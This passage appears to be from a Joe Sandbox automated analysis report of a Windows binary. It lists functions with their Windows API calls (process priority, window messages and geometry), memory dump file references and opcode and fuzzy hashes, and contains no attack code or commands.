                                                                                                                                                                                                                                                                                                • Opcode ID: 2cef274448d629194f45eaed383d3ce2d55fe80bf2e66e2031492a90ae4c9555
                                                                                                                                                                                                                                                                                                • Instruction ID: f86be7005d8cc87f643f266e3e9cbb46ccc5d3431ffdeeb8f838823e3b4bd8b2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2cef274448d629194f45eaed383d3ce2d55fe80bf2e66e2031492a90ae4c9555
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06F06275611B019FDB209F68D948B06BBF8AF18B15B40883DA5AAD3A55D638E540CB04
                                                                                                                                                                                                                                                                                                Function 00423E70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000040), ref: 00423E73
                                                                                                                                                                                                                                                                                                • SetPriorityClass.KERNEL32(00000000), ref: 00423E7A
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ClassCurrentPriorityProcess
                                                                                                                                                                                                                                                                                                • String ID: DiskDefrag$Priority
                                                                                                                                                                                                                                                                                                • API String ID: 1822496659-2550450721
                                                                                                                                                                                                                                                                                                • Opcode ID: 4fd6964c920d56df250ae9ab2acb6b08c2f321825b7161079fb8931e388946b9
                                                                                                                                                                                                                                                                                                • Instruction ID: 65e6db7a757ac2f859af6c567d4dd87af2ab39161d08e9a40c4738524f0132bc
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4fd6964c920d56df250ae9ab2acb6b08c2f321825b7161079fb8931e388946b9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3D05BB1580300BFE2006B90CC4EF553654EB00705F504419BB09950E2C6F55188C7AE
                                                                                                                                                                                                                                                                                                Function 00423E30 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000020), ref: 00423E33
                                                                                                                                                                                                                                                                                                • SetPriorityClass.KERNEL32(00000000), ref: 00423E3A
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ClassCurrentPriorityProcess
                                                                                                                                                                                                                                                                                                • String ID: DiskDefrag$Priority
                                                                                                                                                                                                                                                                                                • API String ID: 1822496659-2550450721
                                                                                                                                                                                                                                                                                                • Opcode ID: 127201b981698b300859cc31292a0172134846cda05812359d7de4f29bee327f
                                                                                                                                                                                                                                                                                                • Instruction ID: 0765593b2bd4a548dc4285e73e255d63b39630105a75dc21cbbf118713a2a5a8
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 127201b981698b300859cc31292a0172134846cda05812359d7de4f29bee327f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1DD05B71580300BBE1006B90CC4EF553658EB00705F50441DBB09950E2C6F45188C76A
                                                                                                                                                                                                                                                                                                Function 00423EB0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000080), ref: 00423EB6
                                                                                                                                                                                                                                                                                                • SetPriorityClass.KERNEL32(00000000), ref: 00423EBD
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ClassCurrentPriorityProcess
                                                                                                                                                                                                                                                                                                • String ID: DiskDefrag$Priority
                                                                                                                                                                                                                                                                                                • API String ID: 1822496659-2550450721
                                                                                                                                                                                                                                                                                                • Opcode ID: 08ddfa592c1efdcbccc132c313bf1a44a42ddabc710bc291cfdf7ca59a51bf9a
                                                                                                                                                                                                                                                                                                • Instruction ID: cd9b91bb96566d5ac382291ffc385f6ffd504ff47ee525bf2600b2da5630117b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08ddfa592c1efdcbccc132c313bf1a44a42ddabc710bc291cfdf7ca59a51bf9a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8D05EB1680301BFE200ABD0CC4EF5A3668EB00B05F90881DFB09950E2CAF45188CBAA
                                                                                                                                                                                                                                                                                                Function 00504274 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AdjustPointer
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1740715915-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 893888af18e71582d7d8a6e2594258244a1919dfa8c6d50e086ea7ae5b819a09
                                                                                                                                                                                                                                                                                                • Instruction ID: 8331d68c480371aadc1d9719c9c5c183a05d30e21e2b40b16138d506a35b66a2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 893888af18e71582d7d8a6e2594258244a1919dfa8c6d50e086ea7ae5b819a09
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE51CFB6605203AFDB299F54D845BAEBFA4FF40310F24992DEA05872D1E731AC91CF90
                                                                                                                                                                                                                                                                                                Function 0042C850 Relevance: 6.1, APIs: 4, Instructions: 143windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130A,00000000,?), ref: 0042C87E
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0042C88F
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130A,00000000,?), ref: 0042C8C7
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0042C8D2
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ClientMessageRectSend
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 166717107-0
                                                                                                                                                                                                                                                                                                • Opcode ID: b63bd0a3e2817953073069a49dd37508e5c619b6a8f1caab7bdc8737ebf16daf
                                                                                                                                                                                                                                                                                                • Instruction ID: 1ae2c4f83a303b8bce0181d8b555b548ed397ea70dfa58a9d15d9eacc3878f9d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b63bd0a3e2817953073069a49dd37508e5c619b6a8f1caab7bdc8737ebf16daf
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC511AB1204301AFD714DE28CD85FABB7EAFBC4704F008A1DF99953694DBB0AD49CA65
                                                                                                                                                                                                                                                                                                Function 00410A20 Relevance: 6.1, APIs: 4, Instructions: 111windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,1088D068,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 00410AB3
                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 00410AC5
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105,00000000), ref: 00410AFA
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00414FD0: GetParent.USER32(?), ref: 00414FD4
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000108E,00000000,00000000), ref: 00410AE5
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Parent$CriticalEnterMessageRedrawSectionSendWindow
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1290606431-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 143fed41e4f3855d081119d730e229c73714f0bc93d99b8b5aa2bb9d49ef1950
                                                                                                                                                                                                                                                                                                • Instruction ID: 5206ba9288f2f952280e77a0a87cb2f91fe58ff6aeb235107940afbc2e9b071e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 143fed41e4f3855d081119d730e229c73714f0bc93d99b8b5aa2bb9d49ef1950
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5631B1723087049BD320DF64DC81F9BB3A4FB98720F10461EE9498B780DB79E841CB9A
                                                                                                                                                                                                                                                                                                Function 00451F00 Relevance: 6.1, APIs: 4, Instructions: 106memoryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ClearVariant$AllocString
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2502263055-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 4b2ef0f21c238e92dbe494a8f0535b867e123380ff90faf569da88cc72c8f9fe
                                                                                                                                                                                                                                                                                                • Instruction ID: d31ef5bb5228e6c3ad645c8f3d1319e11389829958ef149dbed2cab14c92e82a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b2ef0f21c238e92dbe494a8f0535b867e123380ff90faf569da88cc72c8f9fe
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15316F722087059FC310CF58C880B5BB7E8EF88718F104A2EF95997350DB79E909CB9A
                                                                                                                                                                                                                                                                                                Function 00410560 Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 0041056D
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0041058D
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041AA90: GetDC.USER32(?), ref: 0041AADC
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041AA90: SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0041AAF4
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041AA90: GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 0041AB1C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041AA90: ReleaseDC.USER32(?,?), ref: 0041AB37
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,00000000), ref: 004105E2
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0041063B
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
